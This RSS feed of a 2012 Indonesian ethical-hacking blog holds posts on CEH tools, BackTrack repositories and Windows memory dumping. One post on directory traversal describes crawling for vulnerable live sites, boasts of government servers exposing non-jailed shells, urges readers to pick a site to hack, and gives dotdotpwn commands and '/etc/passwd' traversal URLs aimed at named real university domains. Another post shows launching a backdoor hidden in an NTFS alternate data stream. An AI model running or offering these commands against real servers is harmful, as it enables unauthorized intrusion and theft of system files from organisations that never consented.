<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title># ray16</title>
	<atom:link href="http://ray16.info/~me/?feed=rss2" rel="self" type="application/rss+xml" />
	<link>http://ray16.info/~me</link>
	<description>Unofficial Certified Ethical Hacker&#039;s Blog.</description>
	<lastBuildDate>Sat, 12 May 2012 09:34:45 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.2</generator>
		<item>
		<title>[CEH v7] System Hacking : ADS Spy</title>
		<link>http://ray16.info/~me/?p=1357</link>
		<comments>http://ray16.info/~me/?p=1357#comments</comments>
		<pubDate>Mon, 19 Mar 2012 03:12:00 +0000</pubDate>
		<dc:creator>murray</dc:creator>
				<category><![CDATA[CEH]]></category>
		<category><![CDATA[Computer]]></category>
		<category><![CDATA[System Hacking]]></category>
		<category><![CDATA[Alternate Data Stream]]></category>
		<category><![CDATA[forensic ADS]]></category>
		<category><![CDATA[metasploit]]></category>
		<category><![CDATA[NTFS ADS]]></category>
		<category><![CDATA[windows ADS]]></category>

		<guid isPermaLink="false">http://ray16.info/~me/?p=1357</guid>
		<description><![CDATA[Alternate Data Streams telah digunakan sejak NTFS diperkenalkan di WIndows NT. ADS digunakan untuk mendukung HFS (Hirariecal File System) pada windows, sebagaimana MAC Os juga menggunakan ADS, ADS secara default tidak ditampilkan oleh Explorer windows baik pada juga CMD windows, meskipun show hidden files sudah dicentang yang ditampilkan ialah ekstensi file sebelum titik dua (:). [...]]]></description>
			<content:encoded><![CDATA[<p>Alternate Data Streams telah digunakan sejak NTFS diperkenalkan di WIndows NT.</p>
<p>ADS digunakan untuk mendukung HFS (Hirariecal File System) pada windows, sebagaimana MAC Os juga menggunakan ADS, ADS secara default tidak ditampilkan oleh Explorer windows baik pada juga CMD windows, meskipun show hidden files sudah dicentang yang ditampilkan ialah ekstensi file sebelum titik dua (:).</p>
<p>Live Example :</p>
<p>analisa file <strong>.DS_Store</strong> pada komputer XP.</p>
<p>apabila melalui CMD Windows, file <strong>.DS_Store</strong> akan tertampil dengan ekstensi <strong>.DS_Store</strong> sebagaimana gambar berikut :</p>
<p><img src="http://ray16.info/~me/wp-content/uploads/2012/03/untitled10.png" alt="" title="untitled" width="669" height="338" class="alignnone size-full wp-image-1359" /></p>
<p>lain jika kita scan melalui ADS Spy, ekstensi asli pada file ADS <strong>.DS_Store</strong> akan tertampil yaitu <strong>.DS_Store:AFP_Afpinfo</strong></p>
<p><img src="http://ray16.info/~me/wp-content/uploads/2012/03/untitled11.png" alt="" title="untitled" width="552" height="365" class="alignnone size-full wp-image-1361" /></p>
<p>pada gambar diatas, ADS Spy melakukan scanning pada Drive berektensi NTSF yang tersedia di PC, lalu akan menampilkan file ADS yang ada.</p>
<p>hal ini cukup berbahaya karena, attacker bisa meninggalkan backdoor dengan model ADS seperti ini, misal dalam kasus :</p>
<p>attacker melakukan sploit ke mesin korban, lalu mengupload backdoor ke mesin korban dengan metode ADS, sehingga file backdoor tidak dikenali secara umum oleh target, dan attacker <a href="http://www.symantec.com/connect/articles/windows-ntfs-alternate-data-streams" target="_blank">mengeksekusi</a> dengan <a href="http://id.wikipedia.org/wiki/Alternate_data_stream" target="_blank">shell</a> </p>
<pre class="brush: plain">
C:\>start .\&lt;nama_berkas&gt;.&lt;ekstensi&gt;:&lt;nama_stream&gt;.&lt;ekstensi&gt;
</pre>
<p>banyak virus maker dan trojan bahkan spyware menggunakan metode ADS untuk menyerang mesin windows target.</p>
<p>oleh karena itu ADS Spy di rekomendasikan oleh CEH sebagai tools <strong>forensik</strong> untuk mesin windows kategori system hacking yang cukup simple namun powerfull </p>
<p>Good Luck!</p>
]]></content:encoded>
			<wfw:commentRss>http://ray16.info/~me/?feed=rss2&#038;p=1357</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>[CEH v7] Footprinting and Reconnaissance : Alchemy Eye</title>
		<link>http://ray16.info/~me/?p=1342</link>
		<comments>http://ray16.info/~me/?p=1342#comments</comments>
		<pubDate>Sun, 11 Mar 2012 05:10:57 +0000</pubDate>
		<dc:creator>murray</dc:creator>
				<category><![CDATA[CEH]]></category>
		<category><![CDATA[Computer]]></category>
		<category><![CDATA[Footprinting and Reconnaissance]]></category>
		<category><![CDATA[Alchemy Eye]]></category>
		<category><![CDATA[CEH v7]]></category>
		<category><![CDATA[Footprinting and Reconnaissance tools]]></category>
		<category><![CDATA[Footprinting windows]]></category>
		<category><![CDATA[Reconnaissance windows]]></category>

		<guid isPermaLink="false">http://ray16.info/~me/?p=1342</guid>
		<description><![CDATA[Alchemy Eye adalah software network management, software ini adalah software bundle untuk berbagai macam feature network management. Diantara dari feature : a. Monitors ALL Server Functions b. Alerts On Network Failures c. Accessed From Everywhere d. Configurable Log Files e. Server Availability Reports f. Network Scanner g. etc .. Alchemy Eye disertakan dalam CEH v7, [...]]]></description>
			<content:encoded><![CDATA[<p>Alchemy Eye adalah software network management, software ini adalah software bundle untuk berbagai macam feature network management. Diantara dari feature :</p>
<p>a. Monitors ALL Server Functions<br />
b. Alerts On Network Failures<br />
c. Accessed From Everywhere<br />
d. Configurable Log Files<br />
e. Server Availability Reports<br />
f. Network Scanner<br />
g. etc ..</p>
<p>Alchemy Eye disertakan dalam CEH v7, software ini digunakan untuk kegunaan dalam metode footprinting dan reconnaissance pada ethical hacking.</p>
<p>penggunaan Alchemy Eye cukup mudah, karena dengan GUI yang sangat user friendly.</p>
<p><strong>Contoh 1 : Monitoring mail server dan Monitoring URL / Page Web</strong></p>
<p><strong>Add Monitor > Completely New</strong></p>
<p><strong>set Logical Name </strong><br />
<img src="http://ray16.info/~me/wp-content/uploads/2012/03/untitled2.png" alt="" title="untitled2" width="534" height="416" class="alignnone size-full wp-image-1343" /></p>
<p><strong>set Server Address dan Server IP Port</strong><br />
<img src="http://ray16.info/~me/wp-content/uploads/2012/03/untitled3.png" alt="" title="untitled3" width="534" height="416" class="alignnone size-full wp-image-1344" /></p>
<p><strong>Add Monitor > Completely New</strong></p>
<p><strong>set Logical Name </strong><br />
<img src="http://ray16.info/~me/wp-content/uploads/2012/03/untitled4.png" alt="" title="untitled4" width="534" height="416" class="alignnone size-full wp-image-1346" /></p>
<p><strong>set URL to checkin dan parameter lain</strong><br />
<img src="http://ray16.info/~me/wp-content/uploads/2012/03/untitled5.png" alt="" title="untitled5" width="534" height="416" class="alignnone size-full wp-image-1347" /></p>
<p>hasil konfigurasi diatas :</p>
<p><img src="http://ray16.info/~me/wp-content/uploads/2012/03/untitled1-1024x264.png" alt="" title="untitled1" width="1024" height="264" class="alignnone size-large wp-image-1349" /></p>
<p><strong>2. Reporting</strong></p>
<p>salah satu feature dari Alchemy Eye yang sangat di sukai oleh para analis ialah adanya tools untuk generate report tersendiri, yang bentuk nya html. sehingga para analis / ethical hacker bisa melakukan background job scanner / monitoring, dan generate report di lain waktu.</p>
<p><strong>Server Availibilty Report example</strong></p>
<p><img src="http://ray16.info/~me/wp-content/uploads/2012/03/untitled7.png" alt="" title="untitled7" width="801" height="425" class="alignnone size-full wp-image-1350" /></p>
<p><strong>Response time average Report example</strong></p>
<p><img src="http://ray16.info/~me/wp-content/uploads/2012/03/untitled6.png" alt="" title="untitled6" width="801" height="425" class="alignnone size-full wp-image-1351" /></p>
<p><strong>3. Manageable Monitoring</strong></p>
<p>feature lain ialah manageable monitoring dimana pentester bisa meninggalkan desk selagi melakukan monitoring port / server tertentu, dan Alchemy Eye bisa mengirim laporan monitoring dalam beberapa kasus</p>
<p><img src="http://ray16.info/~me/wp-content/uploads/2012/03/untitled8.png" alt="" title="untitled8" width="534" height="416" class="alignnone size-full wp-image-1352" /></p>
<p>pengiriman laporan bisa dilakukan lewat email atau broadcast ke local network computer.</p>
<p><strong>4. Scanning Tools</strong></p>
<p>Alchemy Eye juga mempunyai tools untuk melakukan scanning port dan host alive, namun port yang bisa di scan hanya standart service port saja, misal telnet, dns, pop3, imap dll..</p>
<p><img src="http://ray16.info/~me/wp-content/uploads/2012/03/untitled9.png" alt="" title="untitled9" width="389" height="419" class="alignnone size-full wp-image-1354" /></p>
<p>well secara pendapat saya, Alchemy Eye adalah tools untuk monitoring server / port services yang bisa diandalkan untuk alternatif sofware monitoring di windows.</p>
<p>Good Luck! ;p</p>
]]></content:encoded>
			<wfw:commentRss>http://ray16.info/~me/?feed=rss2&#038;p=1342</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>[BT5-R2] repo baru ditambahkan</title>
		<link>http://ray16.info/~me/?p=1335</link>
		<comments>http://ray16.info/~me/?p=1335#comments</comments>
		<pubDate>Thu, 08 Mar 2012 21:52:34 +0000</pubDate>
		<dc:creator>murray</dc:creator>
				<category><![CDATA[backtrack]]></category>
		<category><![CDATA[Computer]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[My Life]]></category>
		<category><![CDATA[backtrack lokal repository]]></category>
		<category><![CDATA[gxrg repository]]></category>
		<category><![CDATA[iix backtrack repository]]></category>

		<guid isPermaLink="false">http://ray16.info/~me/?p=1335</guid>
		<description><![CDATA[setelah perjuangan panjang kesana kemari nyari koneksi, akhirnya team repository backtrack GXRG bisa dapet koneksi untuk me mirrorkan repository baru backtrack untuk R2 yaitu deb http://updates.repository.backtrack-linux.org revolution main microverse non-free testing repository updates besarnya 65 GB, dengan bantuan dari beberapa teman, repository sebesar 65 GB ini bisa difetch ke repo hanya dengan waktu kurang dari [...]]]></description>
			<content:encoded><![CDATA[<p>setelah perjuangan panjang kesana kemari nyari koneksi, akhirnya team repository backtrack GXRG bisa dapet koneksi untuk me mirrorkan repository baru backtrack untuk R2 yaitu </p>
<pre class="brush: plain">
deb http://updates.repository.backtrack-linux.org revolution main microverse non-free testing
</pre>
<p>repository updates besarnya 65 GB, dengan bantuan dari beberapa teman, repository sebesar 65 GB ini bisa difetch ke repo hanya dengan waktu kurang dari 6 jam, dengan koneksi IX 100Mbps, dan koneksi IIX 1GBps.</p>
<p>sekaligus repo 64 akan ditambahkan di repository lokal bt.gxrg.org yang ada dialamat :</p>
<pre class="brush: plain">
deb http://64.repository.backtrack-linux.org revolution main microverse non-free testing
</pre>
<p>setelah lengkap inilah konfigurasi untuk update repo lokal menggunakan repo GXRG </p>
<p><strong>repo 32 BIT</strong> :</p>
<pre class="brush: plain">

# GXRG BACKTRACK REPOSITORY
deb http://bt.gxrg.org/repo/all revolution main microverse non-free testing
deb http://bt.gxrg.org/repo/32 revolution main microverse non-free testing
deb http://bt.gxrg.org/repo/source revolution main microverse non-free testing
deb http://bt.gxrg.org/repo/updates revolution main microverse non-free testing

# OFFICIAL BACKTRACK REPOSITORY
# deb http://all.repository.backtrack-linux.org revolution main microverse non-free testing
# deb http://32.repository.backtrack-linux.org revolution main microverse non-free testing
# deb http://source.repository.backtrack-linux.org revolution main microverse non-free testing
# deb http://updates.repository.backtrack-linux.org revolution main microverse non-free testing
</pre>
<p><strong>repo 64 BIT</strong> :</p>
<pre class="brush: plain">

# GXRG BACKTRACK REPOSITORY
deb http://bt.gxrg.org/repo/all revolution main microverse non-free testing
deb http://bt.gxrg.org/repo/64 revolution main microverse non-free testing
deb http://bt.gxrg.org/repo/source revolution main microverse non-free testing
deb http://bt.gxrg.org/repo/updates revolution main microverse non-free testing

# OFFICIAL BACKTRACK REPOSITORY
# deb http://all.repository.backtrack-linux.org revolution main microverse non-free testing
# deb http://64.repository.backtrack-linux.org revolution main microverse non-free testing
# deb http://source.repository.backtrack-linux.org revolution main microverse non-free testing
# deb http://updates.repository.backtrack-linux.org revolution main microverse non-free testing
</pre>
<p>terima kasih kepada <a href="http://ediklife.com/">ediklife.com</a> yang udah nemenin malem malem ngerepo XD</p>
<p>*ps apabila terjadi Hash Sum missmatch gunakan option no cache pada apt-get, contoh :</p>
<pre class="brush: shell">
$ apt-get update -o Acquire::http::No-Cache=True
</pre>
<p>Good Luck!.</p>
]]></content:encoded>
			<wfw:commentRss>http://ray16.info/~me/?feed=rss2&#038;p=1335</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Unofficial Certified Ethical Hacker&#8217;s Blog</title>
		<link>http://ray16.info/~me/?p=1331</link>
		<comments>http://ray16.info/~me/?p=1331#comments</comments>
		<pubDate>Tue, 06 Mar 2012 22:47:32 +0000</pubDate>
		<dc:creator>murray</dc:creator>
				<category><![CDATA[My Life]]></category>

		<guid isPermaLink="false">http://ray16.info/~me/?p=1331</guid>
		<description><![CDATA[nampaknya gw akan melakukan sedikit inovasi di blog ini, dengan awal gw ganti description blog ini ke arah yang lebih spesifik. di dunia security, ada berbagai macam sertifikasi, yang bisa diliat di sini. kemarin, salah satu teman kerja saya yaitu sakitjiwa baru saja melakukan sertifikasi CEH, dan menarik nya ada dua buku, dan 5 CD [...]]]></description>
			<content:encoded><![CDATA[<p>nampaknya gw akan melakukan sedikit inovasi di blog ini, dengan awal gw ganti description blog ini ke arah yang lebih spesifik.</p>
<p>di dunia security, ada berbagai macam sertifikasi, yang bisa diliat di <a href="http://certification.about.com/od/securitycerts/a/seccertessentls.htm">sini</a>.</p>
<p>kemarin, salah satu teman kerja saya yaitu <a href="http://sakitjiwa.net/">sakitjiwa</a> baru saja melakukan sertifikasi CEH, dan menarik nya ada dua buku, dan 5 CD panduan CEH, saya minta ijin buat copy CD nya.</p>
<p>walaupun belum ijin buat bagi materi CEH di blog ini, tapi saya niat untuk membagi materi CEH di blog ini xD.</p>
<p>well you guys, you can consider to visit this blog oftenly.</p>
<p>nanti ada categories di sebelah kiri, dengan kategori baru, yaitu CEH, dan saya akan mengkategorikan setiap tulisan dari materi CEH disitu.</p>
<p>tulisan akan di update minimal 1 minggu sekali, dan maximal seminggu 2 kali.</p>
<p>Good Luck!.</p>
]]></content:encoded>
			<wfw:commentRss>http://ray16.info/~me/?feed=rss2&#038;p=1331</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>[BT5-R2] error setelah dist-upgrade</title>
		<link>http://ray16.info/~me/?p=1320</link>
		<comments>http://ray16.info/~me/?p=1320#comments</comments>
		<pubDate>Sat, 03 Mar 2012 11:12:23 +0000</pubDate>
		<dc:creator>murray</dc:creator>
				<category><![CDATA[backtrack]]></category>
		<category><![CDATA[Computer]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[bt5-r2]]></category>
		<category><![CDATA[dist-upgrade]]></category>
		<category><![CDATA[error dist-upgrade]]></category>

		<guid isPermaLink="false">http://ray16.info/~me/?p=1320</guid>
		<description><![CDATA[backtrack 5 r2 udah keluar, user bisa melakukan upgrade dengan 2 cara, dari apt-get atau install ulang lewat iso. pada cara pertama, beberapa user akan mengalami error seperti ini : xilver2dragon@bt:~$ sudo apt-get dist-upgrade [sudo] password for xilver2dragon: Reading package lists... Done Building dependency tree Reading state information... Done Calculating upgrade... Done 0 upgraded, 0 [...]]]></description>
			<content:encoded><![CDATA[<p>backtrack 5 r2 udah keluar, user bisa melakukan upgrade dengan 2 cara, dari apt-get atau install ulang lewat <a href="http://bt.gxrg.org/iso/BT5-R2/" target="_blank">iso</a>.</p>
<p>pada cara pertama, beberapa user akan mengalami error seperti ini :</p>
<pre class="brush: shell">
xilver2dragon@bt:~$ sudo apt-get dist-upgrade

[sudo] password for xilver2dragon: 

Reading package lists... Done

Building dependency tree       

Reading state information... Done

Calculating upgrade... Done

0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.

1 not fully installed or removed.

After this operation, 0B of additional disk space will be used.

Do you want to continue [Y/n]? y

Setting up w3af (1.2-bt0) ...

tar: pybloomfiltermmap-0.2.0.tar.gz: Cannot open: No such file or directory

tar: Error is not recoverable: exiting now

tar: Child returned status 2

tar: Exiting with failure status due to previous errors

/var/lib/dpkg/info/w3af.postinst: line 4: cd: pybloomfiltermmap-0.2.0: No such file or directory

python: can't open file 'setup.py': [Errno 2] No such file or directory

svn: Working copy 'w3af' locked

svn: run 'svn cleanup' to remove locks (type 'svn help cleanup' for details)

dpkg: error processing w3af (--configure):

 subprocess installed post-installation script returned error exit status 1

Errors were encountered while processing:

 w3af

E: Sub-process /usr/bin/dpkg returned an error code (1)
</pre>
<p>error terjadi, karena proses dist-upgrade menambahkan schedule svn update pada w3af, yang apabila tercancel, maka svn akan ngelock directory, yang sebenarnya menurut gw user bisa melakukan svn update sendiri, tanpa harus dimasukkin ke batch proses update oleh backtrack.</p>
<p><strong>solusi nya :</strong></p>
<p>remove direktori w3af, dan pid process yang ngelock.</p>
<pre class="brush: shell">
$ rm /var/lib/dpkg/info/w3af.postinst
$ rm -rf /pentest/web/w3af
</pre>
<p>lakukan kembali dist-upgrade</p>
<pre class="brush: shell">
$ apt-get dist-upgrade
</pre>
<p>lalu untuk menampilkan kernel baru di grub, lakukan update-grub</p>
<pre class="brush: shell">
$ update-grub
</pre>
<p>jika ingin install ulang w3af bisa :</p>
<pre class="brush: shell">
$ cd /pentest/web/
$ svn co https://w3af.svn.sourceforge.net/svnroot/w3af/trunk w3af
</pre>
<p>lalu silahkan fix-splash atau hal lain.</p>
<p>Good Luck!</p>
]]></content:encoded>
			<wfw:commentRss>http://ray16.info/~me/?feed=rss2&#038;p=1320</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>[BT5-R1] Another Story of Directory Traversal ..</title>
		<link>http://ray16.info/~me/?p=1284</link>
		<comments>http://ray16.info/~me/?p=1284#comments</comments>
		<pubDate>Tue, 21 Feb 2012 07:55:37 +0000</pubDate>
		<dc:creator>murray</dc:creator>
				<category><![CDATA[backtrack]]></category>
		<category><![CDATA[Computer]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[web]]></category>
		<category><![CDATA[backtrack 5 r1]]></category>
		<category><![CDATA[bappenas.go.id]]></category>
		<category><![CDATA[directory traversal]]></category>
		<category><![CDATA[dotdotpwn]]></category>
		<category><![CDATA[LFI]]></category>
		<category><![CDATA[local file inclusion]]></category>
		<category><![CDATA[perl dotdotpwn]]></category>
		<category><![CDATA[unsoed.ac.id]]></category>

		<guid isPermaLink="false">http://ray16.info/~me/?p=1284</guid>
		<description><![CDATA[sudah semenjak terakhir Unicode / UTF-8 encoded directory traversal ditemukan pada tahun 2000, hemm 12 tahun lalu.. kemarin gw sempet melakukan pentest di salah satu perusahaan XXXXXXXXX, ada 1 hal yang pengen gw share disini, yaitu YAAA! masih ada nya bug di Directory Traversal! damn dude, elo sebagai web master emang harus banget merhatiin codingan [...]]]></description>
			<content:encoded><![CDATA[<p>sudah semenjak terakhir Unicode / UTF-8 encoded directory traversal ditemukan pada tahun 2000, hemm 12 tahun lalu..</p>
<p>kemarin gw sempet melakukan pentest di salah satu perusahaan XXXXXXXXX, ada 1 hal yang pengen gw share disini, yaitu YAAA! masih ada nya bug di Directory Traversal! damn dude, elo sebagai web master emang harus banget merhatiin codingan elo itu ada bug ini apa enggak.</p>
<p>so setelah itu, gw konek internet, lalu gw melakukan SURFING! untuk cari website yang masih ada bug ini, sampailah gw di salah satu website yang memakai LokoMedia, gw suruh isal untuk analisa bug Directory Traversal di CMS ini, isal lalu menganalisa setiap script pada LokoMedia, terkhusus di hole pada file downlot.php</p>
<p>yang isi script nya ada lah berikut :</p>
<pre class="brush:php">

$direktori = \"files/\"; // folder tempat penyimpanan file yang boleh didownload
$filename = $_GET['file'];

$file_extension = strtolower(substr(strrchr($filename,\".\"),1));

#snip
</pre>
<p>tidak ada sanitize, serta metode pemanggilan nama file yang sangat rentan terhadap DT, script ini dikategorikan vurnable.</p>
<p>namun programmer lokomedia nampaknya sudah tau akan bug ini, tapi di biarkan, karena hasil investigasi bug ini tidak dapat menampilkan file ber ekstensi php.</p>
<p>di script berikut dilarang :</p>
<pre class="brush: php">if ($file_extension=='php'){
  echo "&lt;h1&gt;Access forbidden!&lt;/h1&gt;
        &lt;p&gt;Maaf, file yang Anda download sudah tidak tersedia atau filenya (direktorinya) telah diproteksi. &lt;br /&gt;
        Silahkan hubungi &lt;a href='mailto:redaksi@bukulokomedia.com'&gt;webmaster&lt;/a&gt;.&lt;/p&gt;";
  exit;
}
</pre>
<p>so mari kita ganti misi nya untuk mendapatkan konfigurasi web server saja.</p>
<p><strong>Real Live Example</strong></p>
<p>kita akan melakukan crawling website, dan gw temukan beberapa web (banyak sebenarnya) yang mempunyai vuln di Directory Traversal.</p>
<p><img src="http://ray16.info/~me/wp-content/uploads/2012/02/Screen-Shot-2012-02-21-at-7.37.09-AM.png" alt="" title="Screen Shot 2012-02-21 at 7.37.09 AM" width="740" height="32" class="alignnone size-full wp-image-1300" /></p>
<p>hasil Directory Traversal :</p>
<p><img src="http://ray16.info/~me/wp-content/uploads/2012/02/Screen-Shot-2012-02-21-at-7.34.14-AM.png" alt="" title="Screen Shot 2012-02-21 at 7.34.14 AM" width="754" height="828" class="alignnone size-full wp-image-1294" /></p>
<p>LOOK! kita nemu server pemerintah <strong>NON JAIL SHELL!</strong> it means? yep kalo kita bisa owning lalu upload shell, exploit local, viola we got root :p</p>
<p>another example </p>
<p><img src="http://ray16.info/~me/wp-content/uploads/2012/02/Screen-Shot-2012-02-21-at-7.45.23-AM.png" alt="" title="Screen Shot 2012-02-21 at 7.45.23 AM" width="744" height="36" class="alignnone size-full wp-image-1302" /></p>
<p>hasil Directory Traversal :</p>
<p><img src="http://ray16.info/~me/wp-content/uploads/2012/02/peternakan.png" alt="" title="peternakan" width="754" height="828" class="alignnone size-full wp-image-1299" /></p>
<p>another server yang <strong>NON JAIL SHELL!</strong>, soo pilah pilih web yang mau di hack, dan kita bisa owning satu server *yakin banget looooo :D</p>
<p>lalu bagaimana dengan server windows? see this</p>
<p><img src="http://ray16.info/~me/wp-content/uploads/2012/02/Screen-Shot-2012-02-21-at-8.02.43-AM.png" alt="" title="Screen Shot 2012-02-21 at 8.02.43 AM" width="738" height="35" class="alignnone size-full wp-image-1304" /></p>
<p>hasil Directory Traversal :</p>
<p><img src="http://ray16.info/~me/wp-content/uploads/2012/02/Screen-Shot-2012-02-21-at-8.03.54-AM.png" alt="" title="Screen Shot 2012-02-21 at 8.03.54 AM" width="754" height="828" class="alignnone size-full wp-image-1305" /></p>
<p><strong>The Fuzzer</strong></p>
<p>well adapula dengan traditional way, dengan cara tradisional, menentukan file target yang akan diambil, ex : /etc/passwd, lalu menambahkan setiap titik dua kali lalu slash, tergantung linux yang memakai slash ke kanan, atau windows yang memakai slash ke kiri.</p>
<p>example :</p>
<pre class="brush: plain">
url encode :
/ => %2f

target file = /etc/passwd

http://vuln.com?vulnScript.php?file=..%2fetc%2fpasswd

http://vuln.com?vulnScript.php?file=..%2f..%2fetc%2fpasswd

http://vuln.com?vulnScript.php?file=..%2f..%2f..%2fetc%2fpasswd

dst .. sampe dapet.
</pre>
<p>ada cara yang lebih mudah, lets tool do it! yeah sekarang 2012 dude! *nuff said.</p>
<p>namanya <a href="http://dotdotpwn.blogspot.com/" target="_blank">DotDotPwn</a>, tool untuk sangat sangat memudahkan DT, di backtrack 4 dahulu tools ini tersedia, tapi dihilangkan di backtrack 5, entah apa karena target DT semakin sedikit? </p>
<p>feature yang diberikan dotdotpwn sangat lengkap untuk melakukan directory traversal, bahkan ada metode stdout, os guessing, dan test hingga puluhan ribu metode.</p>
<p>gw berikan contoh untuk teknik penyerangan DT pada metode GET di URL.</p>
<p>untuk web dengan OS Unix</p>
<pre class="brush: shell">
# perl dotdotpwn.pl -o unix -d 10 -u "http://fst.unsoed.ac.id:80/downlot.php?file=TRAVERSAL&#038;x=1" -m http-url -k "root:"
</pre>
<p><img src="http://ray16.info/~me/wp-content/uploads/2012/02/7563ed822b.png" alt="" title="7563ed822b" width="983" height="377" class="alignnone size-full wp-image-1309" /></p>
<p>untuk web dengan OS windows</p>
<pre class="brush: shell">
# perl dotdotpwn.pl -o windows -d 15 -u "http://www.perpus.wima.ac.id/web/downlot.php?file=TRAVERSAL" -m http-url -k "127"
</pre>
<p><img src="http://ray16.info/~me/wp-content/uploads/2012/02/4071c93ef8-1024x357.png" alt="" title="4071c93ef8" width="1024" height="357" class="alignnone size-large wp-image-1312" /></p>
<p>Good Luck! ;p</p>
]]></content:encoded>
			<wfw:commentRss>http://ray16.info/~me/?feed=rss2&#038;p=1284</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Membuat Live RAW Image Random Access Memory (RAM) Pada Mesin Target Windows</title>
		<link>http://ray16.info/~me/?p=1268</link>
		<comments>http://ray16.info/~me/?p=1268#comments</comments>
		<pubDate>Mon, 06 Feb 2012 07:42:45 +0000</pubDate>
		<dc:creator>murray</dc:creator>
				<category><![CDATA[analysis]]></category>
		<category><![CDATA[backtrack]]></category>
		<category><![CDATA[Computer]]></category>
		<category><![CDATA[forensic]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[dumpit]]></category>
		<category><![CDATA[metasploit telnet]]></category>
		<category><![CDATA[meterpreter enable telnet]]></category>
		<category><![CDATA[moonsols dumpit]]></category>
		<category><![CDATA[telnet server meterpreter]]></category>

		<guid isPermaLink="false">http://ray16.info/~me/?p=1268</guid>
		<description><![CDATA[pernah ada yang bayangin gak? di film film kita sering liat ada geng geng teroris hi tech, menggunakan flashdisk nyolokkin flashdisk di komputer target, lalu dengan cepatnya keluar dari TKP, dan menganalisa &#8220;file-entah-apa&#8221; yang di dump ke flashdisk tersebut di suatu tempat tersembunyi. actually gw pernah membayangkan dan mencoba bagaimana sih seperti itu, dan apalagi [...]]]></description>
			<content:encoded><![CDATA[<p>pernah ada yang bayangin gak? di film film kita sering liat ada geng geng teroris hi tech, menggunakan flashdisk nyolokkin flashdisk di komputer target, lalu dengan cepatnya keluar dari TKP, dan menganalisa &#8220;file-entah-apa&#8221; yang di dump ke flashdisk tersebut di suatu tempat tersembunyi.</p>
<p>actually gw pernah membayangkan dan mencoba bagaimana sih seperti itu, dan apalagi gw ini bukan teroris seperti itu.</p>
<p>di security cabang spionase atau undercover seperti ini dengan mudah di pelajari dengan mengambil tahap pertama yaitu forensik, karena dengan melakukan forensik kita terbiasa dengan hal detail, lalu kita bisa hitung timing dan keperluan alat alat untuk melakukan forensik.</p>
<p>pada kali ini kita bahasa forensik Live RAM yang di dump pada satu file RAW, dengan bantuan tools Moonsols DumpIt.</p>
<p>Core Dumping / Memory Dumping / Storage Dumping adalah tekhnik untuk debugging sistem operasi secara offline, tanpa mengganggu kinerja sistem yang sedang berjalan, tipe dumping bisa bermacam macam, ada yang crash dumping, storage dumping dll.</p>
<p>So ini menjadi salah satu teknik forensik, di bidang security, dimana jika seseorang attacker ingin menganalisa sistem operasi target namun tidak mempunyai waktu yang cukup, maka core dumping biasa dilakukan untuk menganalisa sistem operasi yang sedang berjalan pada target di tempat lain.</p>
<p><strong>Moonsols DumpIt</strong></p>
<p>This utility is used to generate a physical memory dump of Windows machines. It works with both x86 (32-bits) and x64 (64-bits) machines.<br />
The raw memory dump is generated in the current directory, only a confirmation question is prompted before starting.<br />
<strong>Perfect to deploy the executable on USB keys, for quick incident responses needs</strong>.</p>
<p>seperti yang ditulis <a href="http://www.moonsols.com/2011/07/18/moonsols-dumpit-goes-mainstream/" target="_blank">msuiche</a> pada blog moonsols, DumpIt di release karena banyaknya yang melakukan forensik pada memory windows terbatas pada tools yang tersedia di publik, beda nya executable setiap arsitektur processor, serta tidak ada yang praktis.</p>
<p><img src="http://ray16.info/~me/wp-content/uploads/2012/02/untitled.png" alt="" title="untitled" width="491" height="495" class="alignnone size-full wp-image-1270" /></p>
<p>DumpIt hanya satu file aplikasi executable, tanpa .ini atau file pendukung lainya, penggunaan nya hanya 1 click lalu hanya ada satu konfirmasi, yaitu yes (y) atau tidak (n).</p>
<p><img src="http://ray16.info/~me/wp-content/uploads/2012/02/dumpit.png" alt="" title="dumpit" width="665" height="670" class="alignnone size-full wp-image-1269" /></p>
<p>begitu yes maka DumpIt akan melakukan dumping live RAM Memory ke dalam satu file, dalam direktori DumpIt.exe itu sendiri, sehingga DumpIt sangat cocok untuk ditaruh ke dalam USB Flashdisk Kosong.</p>
<p>besar file yang di dump adalah besar dari exact memory size, dimana jika RAM target sebesar 4GB, maka DumpIt akan membuat file dumping sebesar 4GB.</p>
<p>ada dua skenario attack pada kasus dumping memory untuk forensik, ialah :</p>
<p>Attacker membawa DumpIt ke satu flashdisk kosong, lalu bertemu dengan target, meminjam komputer windows tersebut, lalu mendumping live RAM Memory si target, Attacker mendapatkan file RAW dari Live RAM memori target lalu menganalisa nya di rumah.</p>
<p>Attacker melakukan penetrasi dari local network dengan metasploit, dengan cara cara :</p>
<p># Enumeration</p>
<pre class="brush:shell">msf > ping -c 1 192.168.1.106
[*] exec: ping -c 1 192.168.1.106

PING 192.168.1.106 (192.168.1.106) 56(84) bytes of data.
64 bytes from 192.168.1.106: icmp_seq=1 ttl=128 time=114 ms

msf > nmap -p 445 192.168.1.106
[*] exec: nmap -p 445 192.168.1.106

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-02-06 11:09 WIT
Nmap scan report for 192.168.1.106
Host is up (0.00098s latency).
PORT    STATE SERVICE
445/tcp open  microsoft-ds
MAC Address: 08:00:27:15:05:2E (Cadmus Computer Systems)

Nmap done: 1 IP address (1 host up) scanned in 0.41 seconds</pre>
<p># Penetration</p>
